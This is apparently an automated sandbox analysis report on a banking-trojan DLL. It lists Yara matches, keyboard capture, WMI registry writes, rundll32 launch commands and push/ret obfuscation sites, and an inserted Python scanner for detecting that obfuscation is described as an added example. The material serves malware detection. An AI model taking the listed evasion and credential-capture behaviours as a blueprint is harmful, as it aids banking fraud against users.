                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E57B64 GetKeyboardState, 3_2_00E57B64

                      E-Banking Fraud

                      Source: Yara match | File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
                      Source: Yara match | File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: hFGZpat9Mf.dll | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_007284AC CheckMenuItem,ExitWindowsEx, 0_2_007284AC
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0076B448
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E7B448
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E41FAC
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_01082244
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00ED17C8
                      Source: C:\Windows\System32\loaddll32.exe | Code function: String function: 007064B8 appears 164 times
                      Source: C:\Windows\System32\loaddll32.exe | Code function: String function: 00706408 appears 48 times
                      Source: C:\Windows\System32\loaddll32.exe | Code function: String function: 00704068 appears 47 times
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 00E16408 appears 48 times
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 00E164B8 appears 164 times
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072A41C NtdllDefWindowProc_A, 0_2_0072A41C
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0074A9F4 NtdllDefWindowProc_A,GetCapture, 0_2_0074A9F4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E3A41C NtdllDefWindowProc_A, 3_2_00E3A41C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E5A9F4 NtdllDefWindowProc_A,GetCapture, 3_2_00E5A9F4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_010814BA SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 3_2_010814BA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_01082465 NtQueryVirtualMemory, 3_2_01082465
                      Source: hFGZpat9Mf.dll | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\loaddll32.exe | Section loaded: fadfadfadad.dll
                      Source: hFGZpat9Mf.dll | Virustotal: Detection: 20%
                      Source: hFGZpat9Mf.dll | ReversingLabs: Detection: 32%
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll"
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER410A.tmp
                      Source: classification engine | Classification label: mal100.troj.evad.winDLL@6/6@4/7
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00708912 GetDiskFreeSpaceA, 0_2_00708912
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_007210CC GetLastError,FormatMessageA, 0_2_007210CC
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3272
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00716C2C FindResourceA, 0_2_00716C2C
                      Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.261009852.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdbl source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: version.pdb` source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdbv source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdbj source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdbr source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: comctl32v582.pdbg source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076B448 push dword ptr [0076FF08h]; ret 0_2_0076BDEF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007080C0 push ecx; mov dword ptr [esp], ecx 0_2_007080C5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0070E154 push 0070E180h; ret 0_2_0070E178
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071611C push ecx; mov dword ptr [esp], edx 0_2_00716121
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A1E4 push 0072A23Dh; ret 0_2_0072A235
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007061A2 push 007061D0h; ret 0_2_007061C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007061A4 push 007061D0h; ret 0_2_007061C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071627C push ecx; mov dword ptr [esp], edx 0_2_00716281
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071E254 push 0071E280h; ret 0_2_0071E278
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00716238 push ecx; mov dword ptr [esp], edx 0_2_0071623D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0070621C push 00706248h; ret 0_2_00706240
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007182BC push ecx; mov dword ptr [esp], ecx 0_2_007182C1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00714558 push 007145A5h; ret 0_2_0071459D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072C64C push 0072C6C1h; ret 0_2_0072C6B9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00714610 push 0071463Ch; ret 0_2_00714634
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072C6C4 push 0072C71Dh; ret 0_2_0072C715
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A85C push 0072A89Fh; ret 0_2_0072A897
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A8D4 push 0072A900h; ret 0_2_0072A8F8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0071C8C0 push ecx; mov dword ptr [esp], edx 0_2_0071C8C2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A90C push 0072A944h; ret 0_2_0072A93C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A9A0 push 0072A9CCh; ret 0_2_0072A9C4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AA70 push 0072AAA3h; ret 0_2_0072AA9B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AAD0 push 0072AAFCh; ret 0_2_0072AAF4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00728AD4 push 00728B12h; ret 0_2_00728B0A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00728B54 push 00728B8Ch; ret 0_2_00728B84
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AB20 push 0072AB63h; ret 0_2_0072AB5B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00728B1C push 00728B48h; ret 0_2_00728B40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072ABEC push 0072AC38h; ret 0_2_0072AC30
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AB88 push 0072ABCBh; ret 0_2_0072ABC3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072AC44 push 0072AC8Fh; ret 0_2_0072AC87
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00706CD8 push ecx; mov dword ptr [esp], eax 0_2_00706CD9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072921C CreatePopupMenu,MITGetCursorUpdateHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetDebugErrorLevel,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxIndirectParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MITUpdateInputGlobals,0_2_0072921C
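The push/ret entries above are what the "call, push, ret" obfuscation signature is built on. A `push imm32; ret` pair is a jump to the pushed address that never appears as a jmp, and in every hit the report lists the pushed immediate is exactly 8 bytes past the ret (for example 0070E178 + 8 = 0070E180), i.e. a short forward jump written as push/ret. The `push ecx; mov dword ptr [esp], reg` entries are a different pattern: they reserve a stack slot and store a register into it, which is ordinary compiler output, so on their own they are weak evidence. The scanner below is added here as an example and is not code from the Joe Sandbox report or from the sample. It finds `push imm32; ret` and `push dword ptr [mem32]; ret` pairs in a raw 32-bit code region and reports whether the pushed value points back into that region; the image base, the byte buffer and the offsets are constructed for the example. It is a plain byte scan rather than a disassembler, so a 0x68 or FF 35 sequence inside another instruction can yield a false hit; treat the output as triage leads to confirm in a disassembler.

```python
"""Triage scanner for push/ret control-flow obfuscation in raw 32-bit x86 code.

Added example; not code from the Joe Sandbox report or the analysed sample.
"""
import struct
import sys
from dataclasses import dataclass

PUSH_IMM32 = 0x68           # push imm32
PUSH_MEM32 = b"\xff\x35"    # push dword ptr [abs32]
RET = 0xC3                  # near ret without immediate


@dataclass
class PushRetHit:
    offset: int             # offset of the push inside the scanned buffer
    va: int                 # virtual address of the push
    ret_va: int             # virtual address of the ret that follows it
    kind: str               # "push imm32; ret" or "push [mem32]; ret"
    operand: int            # pushed immediate, or the address read by the indirect push
    target_in_region: bool  # does the operand point back into the scanned region?

    @property
    def delta(self) -> int:
        # distance from the ret to the pushed address; +8 in every hit the report lists
        return self.operand - self.ret_va


def find_push_ret(code: bytes, base_va: int) -> list[PushRetHit]:
    """Linear byte scan for push imm32; ret and push [mem32]; ret pairs.

    Deliberately not a disassembler: a 0x68 or FF 35 byte inside another
    instruction can produce a false hit, so results are triage leads only.
    """
    hits: list[PushRetHit] = []
    end = base_va + len(code)
    i = 0
    while i < len(code):
        if code[i] == PUSH_IMM32 and i + 5 < len(code) and code[i + 5] == RET:
            imm = struct.unpack_from("<I", code, i + 1)[0]
            hits.append(PushRetHit(i, base_va + i, base_va + i + 5, "push imm32; ret",
                                   imm, base_va <= imm < end))
            i += 6
            continue
        if code[i:i + 2] == PUSH_MEM32 and i + 6 < len(code) and code[i + 6] == RET:
            addr = struct.unpack_from("<I", code, i + 2)[0]
            hits.append(PushRetHit(i, base_va + i, base_va + i + 6, "push [mem32]; ret",
                                   addr, base_va <= addr < end))
            i += 7
            continue
        i += 1
    return hits


def format_hit(hit: PushRetHit) -> str:
    """Render a hit in the same shape as the report's 'Code function' lines."""
    if hit.kind == "push imm32; ret":
        return (f"{hit.va:08X} push {hit.operand:08X}h; ret {hit.ret_va:08X} "
                f"(target = ret{hit.delta:+d})")
    return f"{hit.va:08X} push dword ptr [{hit.operand:08X}h]; ret {hit.ret_va:08X}"


# Constructed sample region (not bytes from the sample), pretending to be mapped at 0x0070E000.
SAMPLE_BASE = 0x0070E000
SAMPLE_CODE = bytes.fromhex(
    "9090"          # 0x00: nop; nop
    "6810000000"    # 0x02: push 10h  (ordinary argument push followed by a call: not flagged)
    "E800000000"    # 0x07: call $+5
    "6819E07000"    # 0x0C: push 0070E019h  (push/ret jump 8 bytes past its ret, like the report's hits)
    "C3"            # 0x11: ret
    "FF3508FF7600"  # 0x12: push dword ptr [0076FF08h]  (indirect variant; pointer lives outside the region)
    "C3"            # 0x18: ret
    "51890C24"      # 0x19: push ecx; mov dword ptr [esp], ecx  (stack-slot prologue: not flagged)
    "90909090"      # 0x1D: padding
)


def scan_file(path: str, base_va: int) -> list[PushRetHit]:
    """Scan a raw code dump (for example an extracted .text section) loaded at base_va."""
    with open(path, "rb") as fh:
        return find_push_ret(fh.read(), base_va)


if __name__ == "__main__":
    if len(sys.argv) == 3:
        found = scan_file(sys.argv[1], int(sys.argv[2], 0))   # python scanner.py text.bin 0x00401000
    else:
        found = find_push_ret(SAMPLE_CODE, SAMPLE_BASE)
    for h in found:
        print(format_hit(h), "" if h.target_in_region else "[target outside scanned region]")
```

On the constructed buffer the scanner reports the forward push/ret jump at 0070E00C with target = ret+8 and the indirect push at 0070E012 whose pointer lies outside the region; the argument push at 0070E002 and the prologue at 0070E019 are not reported.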

                      Hooking and other Techniques for Hiding and Protection

Source: Yara match, file source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match, file source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
